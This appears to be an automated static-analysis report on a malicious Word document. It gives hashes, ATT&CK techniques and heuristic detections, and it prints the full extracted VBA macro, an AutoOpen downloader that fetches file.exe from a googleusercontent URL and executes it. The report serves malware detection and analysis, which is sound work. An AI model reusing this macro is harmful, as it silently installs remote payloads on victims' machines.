Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8f2cb5df962ef239…

MALICIOUS

Office (OOXML)

27.5 KB Created: 2021-06-11 06:23:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2021-06-17
MD5: b3a82d0132fe7d759acb1882236479f2 SHA-1: c236d02924b1daea387fd51ee43660c22f851eae SHA-256: 8f2cb5df962ef239714fe19e303174be8ef0cb0e82e9e3888040288bb6bc4a70
332 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1203 Exploitation for Client Execution

The sample contains VBA macros that are designed to bypass security warnings and instruct the user to enable content. The AutoOpen macro then downloads a file named 'file.exe' from a Googleusercontent URL and executes it. This behavior is consistent with a macro-based downloader malware.

Heuristics 9

  • ClamAV: Doc.Macro.Downloader-6360614-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Downloader-6360614-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell ("file.exe")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        .write xHttp.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • https://doc-00-cc-docs.googleusercontent.com/docs/securesc/hs4gj5lu0ot279gat77g0704g1klb4lh/lcqpkit11n7tjv9aplfjbr4naqmnlrf9/1623739875000/04856528534422820013/04856528534422820013/1ESM4uFFzFByP-5JVIG-8x90tE2Jya3WF?e=download&authuser=0&nonce=0tehoour8u34q&user=04856528534422820013&hash=aogaiqenqbrgipgosvkhnnhejgf8bac7Referenced by macro
    • https://doc-00-cc-docs.googleusercontent.com/docs/securesc/hs4gj5lu0ot279gat77g0704g1klb4lh/lcqpkit11n7tjv9aplfjbr4naqmnlrf9/1623739875000/04856528534422820013/04856528534422820013/1ESM4uFFzFByP-5JVIG-8x90tE2Jya3WF?e=download&authuser=0&nonce=0tehoour8u34q&user=04856528534422820013&hash=aogaiqenqbrgipgosvkhnnhejgf8bac7�Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 978 bytes
SHA-256: 9266e36e5f14ad33382884fb0dbaad6d5d8bb6de6651f596558d57be9781d3c9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()

Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://doc-00-cc-docs.googleusercontent.com/docs/securesc/hs4gj5lu0ot279gat77g0704g1klb4lh/lcqpkit11n7tjv9aplfjbr4naqmnlrf9/1623739875000/04856528534422820013/04856528534422820013/1ESM4uFFzFByP-5JVIG-8x90tE2Jya3WF?e=download&authuser=0&nonce=0tehoour8u34q&user=04856528534422820013&hash=aogaiqenqbrgipgosvkhnnhejgf8bac7", False
xHttp.Send

With bStrm
    .Type = 1 '//binary
    .Open
    .write xHttp.responseBody
    .savetofile "file.exe", 2 '//overwrite
End With

Shell ("file.exe")

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 15872 bytes
SHA-256: 8d1d925668bf2ae6d140015c5b4fd81e6d09993647007ed433008713b85e8c6b
Detection
ClamAV: Doc.Macro.Downloader-6360614-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.